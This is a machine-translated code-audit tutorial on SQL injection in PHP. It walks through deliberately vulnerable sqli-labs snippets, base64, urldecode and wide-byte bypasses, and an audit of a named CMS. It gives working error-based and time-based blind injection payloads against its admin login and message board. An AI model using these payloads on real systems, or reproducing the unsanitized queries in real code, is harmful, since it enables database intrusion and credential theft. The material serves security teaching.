0x00 introduction

Why do we study the first chapter? Because friends who read this article have probably read the file upload series I wrote earlier. If we come to SQL injection here, we can easily understand it. At the same time, SQL injection is also what we often want to find in audit. Since comparison, it is unrealistic to get shell, and there are not many such vulnerabilities.

0x01 character injection

Here we see the code for the first pass of sqli LIBS

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables 
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);
// connectivity 
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
​
    if($row)
    {
    echo "<font size='5' color= '#99FF00'>";
    echo 'Your Login name:'. $row['username'];
    echo "<br>";
    echo 'Your Password:' .$row['password'];
    echo "</font>";
    }
    else 
    {
    echo '<font color= "#FFFF00">';
    print_r(mysql_error());
    echo "</font>";  
    }
}
    else { echo "Please input the ID as parameter with numeric value";}
?>
​

We can see the call$_ GET['id '] gets the parameter content without any query that brings in the SQL statement, that is, the code does not come in and does not open the magic quotation mark, then injection will be formed. If the magic quotation mark is opened, we can still inject in case of numeric type, because magic_quotes_gpc can only escape single quotation marks, double quotation marks, backslashes and NULL, but we can not try these for numeric injection.

http://127.0.0.1/sqli/Less-1/?id=-1%27union%20select%201,user(),3--%20+
​

0x02 code class injection

For business needs, some programs will decode some encoded parameters and bring them into the database query. We often have base64 encoding, and some programs will have built-in url decoding. This kind of writing is usually seen in the framework.

1.base64

<?php
include("../sql-connections/sql-connect.php");
$id=base64_decode($_GET['id']);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
 
if ($row) {
    echo "id:".$row['id']."<br>";
    echo "user name:".$row['username']."<br>";
    echo "password:".$row['password']."<br>";
}else{
    print_r(mysql_error());
}
echo '<hr>';
echo "The query statement is: $sql";
?>
​

The incoming value base64 is decrypted and brought into the query. This injection of magic quotes can not be intercepted. We can pay attention to it when we encounter the parameters encoded by the website for base64.

http://127.0.0.1/sqli/Less-1/base64.php?id=JyB1bmlvbiBzZWxlY3QgMSx1c2VyKCksMyAtLSAr
​

2.urldecode

<?php
include("../sql-connections/sql-connect.php");
$id=urldecode($_GET['id']);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
 
if ($row) {
    echo "id:".$row['id']."<br>";
    echo "user name:".$row['username']."<br>";
    echo "password:".$row['password']."<br>";
}else{
    print_r(mysql_error());
}
echo '<hr>';
echo "The query statement is: $sql";
?>

Because the accepted parameters will only be decoded by the url once, the passed in value is not the value recognized by magic quotes, so it can be bypassed

http://127.0.0.1/sqli/Less-1/base64.php?id=%2527union%20select%201,user(),3--%20+
​

0x03 wide byte injection

<?php
$conn = mysql_connect('localhost', 'root', 'root');
mysql_select_db("security",$conn);
mysql_query("set names 'gbk' ",$conn);
$id=urldecode($_GET['id']);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
 
if ($row) {
    echo "id:".$row['id']."<br>";
    echo "user name:".$row['username']."<br>";
    echo "password:".$row['password']."<br>";
}else{
    print_r(mysql_error());
}
echo '<hr>';
echo "The query statement is: $sql";
?>

There are many explanations on the Internet. You can search them. I won't introduce them in detail here. The general reason is:

id=1'->id=1'->id=1%5c%27

id=1%df'->id=1%df%5c%27->id=1%DF5C%27->id=1 Transport'

Of course, there are other types of injection. I won't list them one by one here. After reading the mysql series articles, you probably know, and you can see what you don't know.

0x04 filtering

Generally, there is no unfiltered condition in a mature cms. General programs choose to use functions to filter, such as addslashes(), or open magic quotes. However, more programs use regular matching to filter, and the use of incorrect matching and replacement methods leads to a greater chance of being bypassed. For example, some programs replace union with empty, Then we can double write the ununion to bypass it, and possibly bypass the external WAF. For integer types, we generally use character conversion such as intval(). Later, we will explain it step by step through actual combat.

0x05 actual audit

After looking for the source code for a long time, I'd better use this xionghai CMS V1.0. This CMS feels good. It has all kinds of holes. It's very suitable for us to learn auditing. At the same time, there are many articles on Auditing this CMS. If you think my writing is not satisfactory, you can see others.

First, we audit the incoming parameters. If you want to quickly see whether there is global filtering, you might as well find a file to output$_ POST,$_ GET, wait.

echo $_POST['b'];
echo $_GET['a'];

Without global filtering, let's go to the background login file admin/files/login.php to see if login.php generally has the possibility of injection

Obviously, the user brought into the query has not been filtered and outputs an error, so you can use the error report to query. Of course, you can also choose the universal password.

payload:

user=1111' and (updatexml(1,concat(0x7e,(select user()),0x7e),1))-- +&password=111&login=yes

Look at the message board files/submit.php

 

  Incoming parameters are not filtered

When inserting at the same time, MySQL is used here_ Error () can be injected with error reporting, otherwise it can only be injected with blind injection.

payload:

cid=0&name='or updatexml(1,concat(0x7e,(version())),0) or'&mail=1111&url=http%3A%2F%2F1&content=%E9%98%BF%E5%BE%B7&save=%E6%8F%90%E4%BA%A4&randcode=&jz=1&tz=1

At the beginning, we said that everything will be fine if the filter function is not used. Digital injection can not use quotation marks

We can see that the incoming cid has been escaped by the addslashes() function. There is no problem with the query, but it is called when browsing the count. Then we can use blind injection or error injection because there is error echo.

payload:

http://127.0.0.1/xhcms/?r=content&cid=1%20and%20If(ascii(substr(database(),1,1))%3C10,0,sleep(10))

There are other injections in this system. Those who want to practice can download and audit. The general idea is that there may be injections where there is user interaction. This is also an audit idea that we don't read through the code.